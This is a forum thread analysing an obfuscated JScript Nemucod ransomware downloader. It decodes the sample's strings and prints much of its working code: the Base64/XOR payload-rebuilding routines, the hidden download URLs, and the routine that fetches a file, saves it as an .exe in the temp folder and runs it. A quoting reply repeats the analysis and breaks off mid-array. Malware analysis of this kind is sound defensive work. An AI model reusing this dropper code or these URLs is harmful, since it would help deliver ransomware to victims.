Malware Analysis 824643807708.wsf-dropper-JS_NEMUCOD.SMK2

DardiM · Aug 23, 2016

824643807708.wsf
From last pack sample on Malware Vault 23-8-16 #4
(Thanks to @Solarquest)

Below is the analysis of the downloader Script, not of the ransomware

5/54 when I make this post
Antivirus scan for 1b852154ce304baa140fc77585a3c067cfc2ddc620a941e6946d1cae87b14739 at 2016-08-23 14:14:04 UTC - VirusTotal

This sample uses almost the same obfuscation methods that one sample seen in a precedent post :
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178
they just simplified / clean some parts, and tried to make urls less easily "visible"

Script used : JScript

- code in a CDATA section of XML document

CDATA - Wikipedia, the free encyclopedia

Most import part (another part is for debugging)
<?xml?>
<package>

</package>

1) Let's look at the Script - strange very long string :

The well known functions (see previous analysis of JS/NEMUCOD) are obfuscated in the Script with a 8146 chars string :

var cipacipa = "CQkJCQkJZnVuY3Rpb24gYmVzdG9sb2NobmFoZXJWSVVWSVVWSVVydGZ0YShmaWxlUGF0aCkNCnsNCiAgICB2QxWzB4M0I0XT0weEVCOyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
...
...
heSgpOw0KCQ0KdDJbMHg4MF09MHgwMEM3O3QyWzB4ODFdPTB4MDBGQztQzBdPTB4MjUxNDt0MlsweEMxXT0weDI1MzQ7dDJbMHhDMl09MHgyNTJDO3QyWzB4QzNdPTB4MjUxQzt0MlsweEM0XT0weDI1MDA7dDJbMHhDNV09MHgyNTNDO3QyWzB4QzZdPTB4MjU1RTt0MlsweEM3XT0weDI1NUY7dDJbMHhDOF09MHgyNTVBO3QyWzB4QzldPTB4MjU1NDt0MlsweENBXT0weDI1Njk7dDJbMHhDQl09MHgyNTY2O3QyWzB4Q0NdPTB4MjU2MDt0MlsweENEXT0weDI.
...
9Ow==".tttoooo();"

You can look at the tttoooo() function
In previous version, they have named it ".manysecretthings()"

I deleted the "trash" part from names that were put to assault ours eyes

bestolochnaherPAPAPAM
bestolochnaherVIUVIUVIU
etc...

2) Let's look at the Script - Decoder function :

String.prototype.tttoooo = function() {

XCOP = 0;
var ddDccC1, ddDccC2, c3, c4;
var sudarinaB = this;
sudarinaB= sudarinaB.replace(/GIBDDSHNIK/g, '');
var out = "";
var len = sud(sudarinaB);

while (XCOP < len) {

do {

ddDccC1 = VITKS[sudarinaB.charCodeAt(XCOP++) & 0xff];

} while (XCOP < len && ddDccC1 == -1);
if (ddDccC1 == -1)
break;

var dodo = false;
do {

ddDccC2 = VITKS[sudarinaB.charCodeAt(XCOP++) & 0xff];
dodo = XCOP < len && ddDccC2 == -1;

} while (dodo);

if (ddDccC2 == -1)
break;

out += String.fromCharCode((ddDccC1 << 2) | ((ddDccC2 & 0x30) >> 4));

do {

c3 = sudarinaB.charCodeAt(XCOP++) & 0xff;

if (c3 == 10*6+0.5*2)
return out;

c3 = VITKS[c3];

} while (XCOP < len && c3 == -1);

if (c3 == -1)
break;

out += String.fromCharCode(((ddDccC2 & 0XF) << 4) | ((c3 & 0x3c) >> 2));

do {

c4 = sudarinaB.charCodeAt(XCOP++) & 0xff;

if (c4 == 61)
return out;

c4 = VITKS[c4];

} while (XCOP < len && c4 == -1);

if (c4 == -1)

break;

out += String.fromCharCode(((c3 & 0x03) << 6) | c4);

}

return out;

};

- '"Oh a complicated function, it will be difficult to decode the strings"
- "No, remember the other analogue sample and analysis I linked above..."

This function not only makes a Base64 decode, but before it deletes some chars used to obfuscate more the string.

.replace(/GIBDDSHNIK/g, '')

It also uses an array to make the Base64 Decode

var VITKS = new Array(-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-39,-102,-102,-102,-38,-49,-48,-47,-46,-45,-44,-43,-42,-41,-40,-102,-102,-102,-102,-102,-102,-102,-101,-100,-99,-98,-97,-96,-95,-94,-93,-92,-91,-90,-89,-88,-87,-86,-85,-84,-83,-82,-81,-80,-79,-78,-77,-76,-102,-102,-102,-102,-102,-102,-75,-74,-73,-72,-71,-70,-69,-68,-67,-66,-65,-64,-63,-62,-61,-60,-59,-58,-57,-56,-55,-54,-53,-52,-51,-50,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102);

var VITKI, VITKSn = VITKS.length;
for (VITKI= 0; VITKI < VITKSn; ++VITKI) {

VITKS[VITKI] = VITKS[VITKI] + 101;

}

3) Let's look at the Script - Long String decoded :

What look likes the VERY long string once decoded ?

function rtfta(filePath) {

var rosteks = WScript["CreateObject"]("ADODB.Stream");
rosteks["type"] = 2;
rosteks["Charset"] = 437;
rosteks["open"]();
rosteks["LoadFromFile"](filePath);
var fileString = rosteks["ReadText"];
rosteks["close"]();
return fsta(fileString);

};

function fsta(fileString) {

var t1 = new Array();

t1[0xC7] = 0x80;
t1[0xFC] = 0x81;
t1[0xE9] = 0x82;
t1[0xE2] = 0x83;
t1[0xE4] = 0x84;
t1[0xE0] = 0x85;
t1[0xE5] = 0x86;
t1[0xE7] = 0x87;
t1[0xEA] = 0x88;
t1[0xEB] = 0x89;
t1[0xE8] = 0x8A;
t1[0xEF] = 0x8B;
t1[0xEE] = 0x8C;
t1[0xEC] = 0x8D;
t1[0xC4] = 0x8E;
t1[0xC5] = 0x8F;
t1[0xC9] = 0x90;
t1[0xE6] = 0x91;
t1[0xC6] = 0x92;
t1[0xF4] = 0x93;
t1[0xF6] = 0x94;
t1[0xF2] = 0x95;
t1[0xFB] = 0x96;
t1[0xF9] = 0x97;
t1[0xFF] = 0x98;
t1[0xD6] = 0x99;
t1[0xDC] = 0x9A;
t1[0xA2] = 0x9B;
t1[0xA3] = 0x9C;
t1[0xA5] = 0x9D;
t1[0x20A7] = 0x9E;
t1[0x192] = 0x9F;
t1[0xE1] = 0xA0;
t1[0xED] = 0xA1;
t1[0xF3] = 0xA2;
t1[0xFA] = 0xA3;
t1[0xF1] = 0xA4;
t1[0xD1] = 0xA5;
t1[0xAA] = 0xA6;
t1[0xBA] = 0xA7;
t1[0xBF] = 0xA8;
t1[0x2310] = 0xA9;
t1[0xAC] = 0xAA;
t1[0xBD] = 0xAB;
t1[0xBC] = 0xAC;
t1[0xA1] = 0xAD;
t1[0xAB] = 0xAE;
t1[0xBB] = 0xAF;
t1[0x2591] = 0xB0;
t1[0x2592] = 0xB1;
t1[0x2593] = 0xB2;
t1[0x2502] = 0xB3;
t1[0x2524] = 0xB4;
t1[0x2561] = 0xB5;
t1[0x2562] = 0xB6;
t1[0x2556] = 0xB7;
t1[0x2555] = 0xB8;
t1[0x2563] = 0xB9;
t1[0x2551] = 0xBA;
t1[0x2557] = 0xBB;
t1[0x255D] = 0xBC;
t1[0x255C] = 0xBD;
t1[0x255B] = 0xBE;
t1[0x2510] = 0xBF;
t1[0x2514] = 0xC0;
t1[0x2534] = 0xC1;
t1[0x252C] = 0xC2;
t1[0x251C] = 0xC3;
t1[0x2500] = 0xC4;
t1[0x253C] = 0xC5;
t1[0x255E] = 0xC6;
t1[0x255F] = 0xC7;
t1[0x255A] = 0xC8;
t1[0x2554] = 0xC9;
t1[0x2569] = 0xCA;
t1[0x2566] = 0xCB;
t1[0x2560] = 0xCC;
t1[0x2550] = 0xCD;
t1[0x256C] = 0xCE;
t1[0x2567] = 0xCF;
t1[0x2568] = 0xD0;
t1[0x2564] = 0xD1;
t1[0x2565] = 0xD2;
t1[0x2559] = 0xD3;
t1[0x2558] = 0xD4;
t1[0x2552] = 0xD5;
t1[0x2553] = 0xD6;
t1[0x256B] = 0xD7;
t1[0x256A] = 0xD8;
t1[0x2518] = 0xD9;
t1[0x250C] = 0xDA;
t1[0x2588] = 0xDB;
t1[0x2584] = 0xDC;
t1[0x258C] = 0xDD;
t1[0x2590] = 0xDE;
t1[0x2580] = 0xDF;
t1[0x3B1] = 0xE0;
t1[0xDF] = 0xE1;
t1[0x393] = 0xE2;
t1[0x3C0] = 0xE3;
t1[0x3A3] = 0xE4;
t1[0x3C3] = 0xE5;
t1[0xB5] = 0xE6;
t1[0x3C4] = 0xE7;
t1[0x3A6] = 0xE8;
t1[0x398] = 0xE9;
t1[0x3A9] = 0xEA;
t1[0x3B4] = 0xEB;
t1[0x221E] = 0xEC;
t1[0x3C6] = 0xED;
t1[0x3B5] = 0xEE;
t1[0x2229] = 0xEF;
t1[0x2261] = 0xF0;
t1[0xB1] = 0xF1;
t1[0x2265] = 0xF2;
t1[0x2264] = 0xF3;
t1[0x2320] = 0xF4;
t1[0x2321] = 0xF5;
t1[0xF7] = 0xF6;
t1[0x2248] = 0xF7;
t1[0xB0] = 0xF8;
t1[0x2219] = 0xF9;
t1[0xB7] = 0xFA;
t1[0x221A] = 0xFB;
t1[0x207F] = 0xFC;
t1[0xB2] = 0xFD;
t1[0x25A0] = 0xFE;
t1[0xA0] = 0xFF;

var resultArray = new Array();
for (var Tj = 0; Tj < fileString["length"]; Tj++) {
var OVc9 = fileString["charCodeAt"](Tj);
if (OVc9 < 128) {
var HIi3 = OVc9;
} else {
var HIi3 = t1[OVc9];
}
resultArray["push"](HIi3);

};

return resultArray;
};

function fats(codeArray) {

};

function satt(filePath, codeArray) {

var rosteks = WScript["CreateObject"]("ADODB.Stream");
rosteks["type"] = 2;
rosteks["Charset"] = 437;
rosteks["open"]();
rosteks["writeText"](fats(codeArray));
rosteks["SaveToFile"](filePath, 2);
rosteks["close"]();

};

function xdac(cca) {

for (var Tj = 0; Tj < cca["length"]; Tj++) {

cca[Tj] ^= xKey[Math.floor(Tj % xKey.length)];

}
return cca;

};

We can see well known functions used to make the obfuscated exe file (not seen as an exe file when downloaded, with content modified), becomes the real exe ransomware :

rtfta => load content payload content and call fsta(fileString)
xdac => deobfuscation with XOR function, using xKey Array
fsta => first "character substitution cipher" decoder, also use to obtain the xKey
fats => second "character substitution cipher" decoder
satt => calls fats function and save the file as real ".exe"

and xKey => used for the main XOR decode part

This last var is now in the main Script part :

var xKey = fsta("pxhMZi6AIY0OtsmRMnKeSwpSwoJtpSdT")

See this post : spoiler with details :

https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-530229

4) Are the URLS used well obfuscated ? :

From precedent analysis of analogue method :

try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

=> URLs obfuscation method : unescape Unicode

http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"

This time they have "encoded" the URLS and we need the Decode function to now what chars have to be deleted before the Base64 Decode :

"GIBDDSHNIK" has to be delete

But we can recognize the same structure with a loop used

- Shtyler4 => _a2
- 3 strings in a tab => 3 urls to retrieve the payload

This time, one file name for the payload , and not 3 times the same payload with 3 different name once downloaded...

var _a5 = ["bWFqLmNsYWFzLmZyL0hKZ2hqYjGIBDDSHNIKU0","a291dG9rdWthbi53ZWIuZmMyGIBDDSHNIKLmNvbS9ISmdoamI1NA==","emlrdW5vYW5hLmhvdWtvdS1vbmNoaGIBDDSHNIKS5jb20vSEpnaGpiNTQ="];

for(uueee in _a5){

try{

_a2("http://"+_a5[uueee].tttoooo() + "?nTStkY=KsBazYnqnR","qcoPPlYEo");

}catch(_a3){}

}

First Step :

'bWFqLmNsYWFzLmZyL0hKZ2hqYj~~GIBDDSHNIK~~U0'
"a291dG9rdWthbi53ZWIuZmMy~~GIBDDSHNIK~~LmNvbS9ISmdoamI1NA=="
"emlrdW5vYW5hLmhvdWtvdS1vbmNoa~~GIBDDSHNIK~~S5jb20vSEpnaGpiNTQ="

'bWFqLmNsYWFzLmZyL0hKZ2hqYjU0"
"a291dG9rdWthbi53ZWIuZmMyLmNvbS9ISmdoamI1NA=="
"emlrdW5vYW5hLmhvdWtvdS1vbmNoaS5jb20vSEpnaGpiNTQ="

Second step :

=> using the Base64 Decode tool from notepad++ :

maj.claas.fr/HJghjb54
koutokukan.web.fc2.com/HJghjb54
zikunoana.houkou-onchi.com/HJghjb54

Third Step : concatenation

URLS (I wrote 'hxxp' to protect from miss-click):

hxxp://maj.claas.fr/HJghjb54?nTStkY=KsBazYnqnR
hxxp://koutokukan.web.fc2.com/HJghjb54?nTStkY=KsBazYnqnR
hxxp://zikunoana.houkou-onchi.com/HJghjb54?nTStkY=KsBazYnqnR

some Japanese links...

As detected with some comments from the sample

// 対象フォルダのサブフォルダ列挙 => Subfolder enumeration of the target folder
// サブフォルダ内のファイルを移動 => Move files in subfolders
// フォルダ内のファイル列挙 => Folders in file list
// ファイルを移動 => Files listed in the folder
// ファイルとサブフォルダがなければフォルダ削除 => Delete folder If there is no files and

Payload => file : qcoPPlYEo => qcoPPlYEo.exe if correctly deobfuscated by the script

5) Conclusion :

Previous similar sample :

https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178

On the first,
- The Urls and payload names was very easy to retrieve, without the need to understand their decoding function and obfuscated parts.
- 3 Different names for the same payload downloaded from each available URL without test => 3 ransomware on you PC

- .exe added if all was ok.

In this sample, we have only to know that "GIBDDSHNIK" is the part to delete (all occurences)
- 1 name for the downloaded obfuscated payload (without extension)
- .exe added if all was ok.

In the both samples, a lot of useless vars and functions, just to complicate a bit more !?

In this sample some Japanese comments
These functions are too "in clear" to be real functions for the Script (testing parts !?)
(And never called

)

function ProcessFolder(folderPath)
{
var path = "";

for (var i in maskArr)
{

path = folderPath + "\\" + maskArr;

try { fsoObj.DeleteFile(path); } catch (e) {}
try { fsoObj.DeleteFolder(path); } catch (e) {}

}

var subfolders = new Enumerator(fsoObj.GetFolder(folderPath).SubFolders);

for(; !subfolders.atEnd(); subfolders.moveNext())
ProcessFolder(subfolders.item().Path);

}
function moveToParentFolder(parentFolder, folder) {

// 対象フォルダのサブフォルダ列挙 // Subfolder enumeration of the target folder
var subFolders = new Enumerator(folder.SubFolders);
// サブフォルダ内のファイルを移動 // Move files in subfolders
for (; !subFolders.atEnd(); subFolders.moveNext()) {

moveToParentFolder(parentFolder, subFolders.item());

}
// フォルダ内のファイル列挙
var files = new Enumerator(folder.Files);
// ファイルを移動 // Files listed in the folder
for (; !files.atEnd(); files.moveNext()) {
try {

files.item().Move(parentFolder.Path + '\\');
}
catch (e) {
WScript.Echo(e.description + "\n" + files.item().Path);
}

}
// ファイルとサブフォルダがなければフォルダ削除 // Delete folder If there is no files and subfolders
if (folder.Files.Count == 0 && folder.SubFolders.Count == 0) {
try {

folder.Delete(true);

}
catch (e) {

WScript.Echo(e.description + "\n" + folder.Path);

}
}

}

In this family of obfuscated Script :

We just have to find the

.replace(/GIBDDSHNIK/g, '')
delete all occurences in the string we want to decode
copy-paste them on notepad++ (or another tool) => Base64 Decode

and get just after the URLs, to blacklist them.

To be able to retrieve the obfuscated payload, just a small part has to be modified on the Script :

- it is then possible to run the modified Script and wait to get the good obfuscated payload ...

But it is not the purpose of this analysis

See my precedent analysis of analogue sample

https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178
and the post after, with complete deobfuscation for this precedent sample
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-530229

To make obfuscation they used a lot of different methods, and in my precedent analysis, I even said it was the first time I was seeing too many different methods in one Script.
But it was easy to get the URLS and payload names by looking directly the try...catch part at the end.
In this new sample, they tried to improve this part.

Below, what I said in precedent analysis conclusion :

CONCLUSION :

This current script try to download 3 files (same files, but it gives them 3 different names )
=> no part to see if one was already successfully downloaded

=> no part to see if the deobfuscation made the good exe files (for example a check of "MZ" at the beginning of the file)

The obfuscation of the script is very well done by several methods, I have rarely seen as many different good methods in one file.
But : the URLs are VERY easy to be retrieved at the end of the file, in the try catch parts...

=> a simple unscape unicode method...
=> I got them since the beginning - see part 2)
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178

So to End this Part 3 analysis :

=> "Why, plz why ?"
The only "good answer" would be : "downloading the obfuscated ransomware without the functions to deobfuscate it is useless"
=> "yes but it's too easy to black-list / report the URLs and file names used, and : we don't specially want to analyze the ransomwares"

It's also a (bad) way to quickly update the URLs / names parts when distributed ...

N.B: adding // (commentary line) to the "run" part line allows people to have the deobfuscated files (the last part of function seen in try...catch blocks). And also because we can see their names that appears in clear (we just have to add ".exe" to the names) => easy to find them with a "search" on HD after their are "ready" .exe files.

I put here a long part, we can see different methods (only for the 'beauty'

)
I removed the bestolochnaherVIUVIUVIU and other parts added to the names

var qtcnthltqfqrhfq = {'U': 'S', ':': '.','88':'', '77':'','CHAGNER': 'X', '99':'', 'VLOPH':'ons'};

function achievment(bidttt){if(bidttt==1){return 2;}else{return 17;}

return 3;};
function center(rivulet) {
request = rivulet;
for (var XCOP in qtcnthltqfqrhfq){request = request.replace(XCOP, qtcnthltqfqrhfq[XCOP]);}
return request;

};

var DRUZA = 43* (51-2)*(27-26-1);

function misterdenisk(POPSPOPx, POPSPOPy) {

POPSPOPx = DDPOPSPOP * POPSPOPddd;
POPSPOPy = POPSPOPZZ + 245;

};

var secupeku=(WScript +"87658123" =="GIBDDSHNIKV2lGIBDDSHNIKuZG93cyBTY3JpcGIBDDSHNIKHQgSG9zdA==".tttoooo() +"87658123")&&typeof(GzEAPd)==="undefined";

var chosen = 0.5 * 2;
if(!secupeku){

misterdenisk.scale = function(p, scaleX, scaleY) {

if (XCOPsObject(scaleX)) {
scaleY = scaleX.y;
scaleX = scaleX.x;
} else if (!XCOPsNumber(scaleY)) {
scaleY = scaleX;
}
return new misterdenisk(p.x * scaleX, p.y * scaleY);

};

}

if(!secupeku){

misterdenisk.sameOrN = function(param1, param2) {
return param1.D == param2.D || param1.F == param2.F;
};

misterdenisk.angle = function(p) {
return Math.atan2(p.y, p.x);
};

}

var VARDOCF ="GIBDDSHNIKJVRFTVAlGIBDDSHNIK".tttoooo();
var finde = "QWN0aXZlWE9iamVjdAGIBDDSHNIK=GIBDDSHNIK=GIBDDSHNIK".tttoooo();
String.prototype.center2 = function () {

var pirkinst = {

VARDOCG: this

};
pirkinst.VARDOCE = pirkinst.VARDOCG["c3VGIBDDSHNIKic3RyGIBDDSHNIKaW5GIBDDSHNIKn".tttoooo()](DRUZA, chosen);
return pirkinst.VARDOCE;

};

var sirdallos ="GIBDDSHNIKRXhwYW5GIBDDSHNIKkRW52aXGIBDDSHNIKJvbm1lbnRTdHJGIBDDSHNIKpbmdz".tttoooo();
var Native = function(options){

};
Native.XCOPmplement = function(objects, properties){
for (var XCOP = 0, l = objects.length; XCOP < l; XCOP++) objects[XCOP].XCOPmplement(properties);
};
var d7 = center("77M"+"88SX"+"99ML"+("purposes","secured","environments","adhere","thoughtfulness","2.")+"CHAGNERM"+"LH"+"TT"+("intoxicating","insurmountable","hungary","dynamic","altitude","beverages","journalistic","prominent","P}")+"WU"+("trumps","stupidly","browse","stimulation","redound","corse","raspberry","cr")+("motherhood","tibetan","jockey","ronald","extended","derived","storing","saturnine","ip")+"t:S"+("welding","artifice","nationally","integration","exponent","census","personal","middling","h")+"e"+("cutter","stylish","booty","enclose","compliance","screenshot","jeweller","afford","ll"));
var DoUtra = [finde, sirdallos,VARDOCF, ""+"."+("damage","passage","instruments","deviation","kerry","metrical","suburban","bereft","exe"), "UnGIBDDSHNIKVuGIBDDSHNIK".tttoooo(),d7];
Richters = DoUtra.shift();
fabled = "BIL2NEBIL";
Native.genericize = function(object, property, check){
if ((!check || !object[property]) && typeof object.prototype[property] == 'function') object[property] = function(){

return object.prototype[property].apply(args.shift(), args);
};

};
Native.typize = function(object, family){
if (!object.type) object.type = function(item){
return ($type(item) === family);
};
};
var LitoyDISK = this[Richters ];
casque = (("globe", "extricate", "tasmania", "overall", "unicameral", "scuba", "tangent", "pwrthrthrthtr") + "hrhrwhrwh").center2();
tudabilo1 = (("located", "blend", "partnerships", "arsenic", "thunderbolt", "defer", "threadbare", "shingles", "beckon", "serhrth") + "herrth4th4wh").center2();
var d2 = DoUtra.pop();
var rampart = new LitoyDISK(d2.split("}")[1]);
var sudabilo1 = new LitoyDISK(d2.split("}")[0]);
var vulture = rampart[DoUtra.shift()](DoUtra.shift());
var weasel = "E";

var amalgamation = DoUtra.shift();
var promises = DoUtra.shift();
var ostrokoncert = "b3GIBDDSHNIKBlbGIBDDSHNIKg==".tttoooo();

RhXxGud = "type";

var cipacipa = "CQkJCQkJZnVuY3Rpb24gYmVzdG9sb2NobmFoZXJWSVVWSVVWSVVydGZ0YShmaWxlUGF0aCkN...
...
klVVklVVklVY2NhW1RqXSBePSBiZXN0b2xvY2huYWhlclRSQXhLZXlbTWF0aC5mbG9vcihUaiAlIGJlc3RvbG9jaG5haGVyVFJBeEtleS5sZW5ndGgpXTsNCgl9CQkNCglyZXR1cm4gYmVzdG9sb2NobmFoZXJWSVVWSVVWSVVjY2E7DQp9Ow==".tttoooo();

function _a2(gutter, StrokaParam2) {

var wandermander = vulture;
wandermander=wandermander+ "\u002f";
wandermander=wandermander + StrokaParam2 ;

sudabilo1[ostrokoncert](("castilian","calibre","villa","personally","jewellery","percent","aging","pressure","G" + weasel) + ("negotiate","drover","firebrand","righthand","unalloyed","topmost","authorised","priceless","lesbians","bounce","T"), gutter, false);
sudabilo1.setRequestHeader("User-Agent", "TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk=".tttoooo());
sudabilo1[tudabilo1 + ("obtuse","devastation","overweening","herself","incarnation","end")]();

if (secupeku) {

var Nananananananana = new LitoyDISK((("copyrighted","prediction","hosiery","declaration","shakespeare","irrigation","AETOTYES")+("classical","milwaukee","emetic","portrayal","penitentiary","malevolent","zshops","propulsion","O")+"DB"+("divisible","jewelry","larynx","designer","capitalist","lambent","unveil",".S")+"tr12").replace("ETOTYES", "D").replace("12", "eam"));
Nananananananana[ostrokoncert]();
Nananananananana[RhXxGud] = chosen;
GaSMa = "BIL10NEBIL";
Nananananananana["d3GIBDDSHNIKJpdGIBDDSHNIKGU=".tttoooo()](sudabilo1[("declension","suggestions","erratic","hallow","bedouin","malleable","Re")+"s"+("oppressor","giuseppe","crete","equitable","thompson","trill","p")+qtcnthltqfqrhfq['VLOPH']+"e"+"QGIBDDSHNIKmGIBDDSHNIK9GIBDDSHNIKkeQ=GIBDDSHNIK=".tttoooo()]);
XWaxeQhw = "BIL11NEBIL";
Nananananananana[(casque + "o"+("notre","graphic","iceberg","frozen","environment","220")+("silky","smarter","graham","inanimate","channel","creation","barrel","22i")+"tion").replace("22"+("dormant","habitat","timed","babble","assignments","filed","shiny","022"), tudabilo1)] = 0;
krDwvrh = "BIL12NEBIL";
Nananananananana["c2F2GIBDDSHNIKZVRvRmlsZQ=GIBDDSHNIK=GIBDDSHNIK".tttoooo()](wandermander, 2);
SswQdi = "BIL13NEBIL";
Nananananananana["Y2xvc2U=".tttoooo()]();
var FrankSinatra=rtfta(wandermander);
FrankSinatra=xdac(FrankSinatra);
wandermander = wandermander + amalgamation;
satt(wandermander, FrankSinatra );
rampart[promises](wandermander, chosen, true);
}

The run part :
bestolochnaherVIUVIUVIUrampart[bestolochnaherVIUVIUVIUpromises](bestolochnaherVIUVIUVIUwandermander, bestolochnaherVIUVIUVIUchosen, true);

The run part with names simplified :
rampart[promises](wandermander, chosen, true);

The run part deobfuscated :
objShell.Run(path, 1, true)

Example for path :
c:\users\DardiM\AppData\Local\temp\qcoPPlYEo.exe

Der.Reisende · Aug 23, 2016

DardiM said:
824643807708.wsf
From last pack sample on Malware Vault 23-8-16 #4
(Thanks to @Solarquest)

5/54 when I make this post
https://www.virustotal.com/en/file/...20a941e6946d1cae87b14739/analysis/1471961644/

This sample used the same obfuscation methods seen in a precedent post :
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178

1) Let's look at the Script - strange very long string :

The well known functions (see previous analysis of JS/NEMUCOD) are obfuscated in the Script with a 8146 chars string :

var cipacipa = "CQkJCQkJZnVuY3Rpb24gYmVzdG9sb2NobmFoZXJWSVVWSVVWSVVydGZ0YShmaWxlUGF0aCkNCnsNCiAgICB2QxWzB4M0I0XT0weEVCOyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
...
...
heSgpOw0KCQ0KdDJbMHg4MF09MHgwMEM3O3QyWzB4ODFdPTB4MDBGQztQzBdPTB4MjUxNDt0MlsweEMxXT0weDI1MzQ7dDJbMHhDMl09MHgyNTJDO3QyWzB4QzNdPTB4MjUxQzt0MlsweEM0XT0weDI1MDA7dDJbMHhDNV09MHgyNTNDO3QyWzB4QzZdPTB4MjU1RTt0MlsweEM3XT0weDI1NUY7dDJbMHhDOF09MHgyNTVBO3QyWzB4QzldPTB4MjU1NDt0MlsweENBXT0weDI1Njk7dDJbMHhDQl09MHgyNTY2O3QyWzB4Q0NdPTB4MjU2MDt0MlsweENEXT0weDI.
...
9Ow==".tttoooo();"

You can look at thetttoooo() function
In previous version, they have named it ".manysecretthings()"

I deleted the "trash" part from name that were put to assault ours eyes

bestolochnaherPAPAPAM
bestolochnaherVIUVIUVIU
etc...
2) Let's look at the Script - Decoder function :

String.prototype.tttoooo = function() {

XCOP = 0;
var ddDccC1, ddDccC2, c3, c4;
var sudarinaB = this;
sudarinaB= sudarinaB.replace(/GIBDDSHNIK/g, '');
var out = "";
var len = sud(sudarinaB);

while (XCOP < len) {

do {

ddDccC1 = VITKS[sudarinaB.charCodeAt(XCOP++) & 0xff];
} while (XCOP < len && ddDccC1 == -1);
if (ddDccC1 == -1)
break;

var dodo = false;
do {

ddDccC2 = VITKS[sudarinaB.charCodeAt(XCOP++) & 0xff];
dodo = XCOP < len && ddDccC2 == -1;
} while (dodo);

if (ddDccC2 == -1)
break;

out += String.fromCharCode((ddDccC1 << 2) | ((ddDccC2 & 0x30) >> 4));

do {

c3 = sudarinaB.charCodeAt(XCOP++) & 0xff;

if (c3 == 10*6+0.5*2)
return out;

c3 = VITKS[c3];
} while (XCOP < len && c3 == -1);

if (c3 == -1)
break;

out += String.fromCharCode(((ddDccC2 & 0XF) << 4) | ((c3 & 0x3c) >> 2));

do {

c4 = sudarinaB.charCodeAt(XCOP++) & 0xff;

if (c4 == 61)
return out;

c4 = VITKS[c4];
} while (XCOP < len && c4 == -1);

if (c4 == -1)

break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
}

return out;
};

- '"Oh a complicated function, it will be difficult to decode the strings"
- "No, remind you the other analogue sample and analysis I linked above..."

This function not only makes a Base64 decode but also delete some chars used to obfuscate more the string.

.replace(/GIBDDSHNIK/g, '')

It also need an array to make the Base64 Decode

var VITKS = new Array(-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-39,-102,-102,-102,-38,-49,-48,-47,-46,-45,-44,-43,-42,-41,-40,-102,-102,-102,-102,-102,-102,-102,-101,-100,-99,-98,-97,-96,-95,-94,-93,-92,-91,-90,-89,-88,-87,-86,-85,-84,-83,-82,-81,-80,-79,-78,-77,-76,-102,-102,-102,-102,-102,-102,-75,-74,-73,-72,-71,-70,-69,-68,-67,-66,-65,-64,-63,-62,-61,-60,-59,-58,-57,-56,-55,-54,-53,-52,-51,-50,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,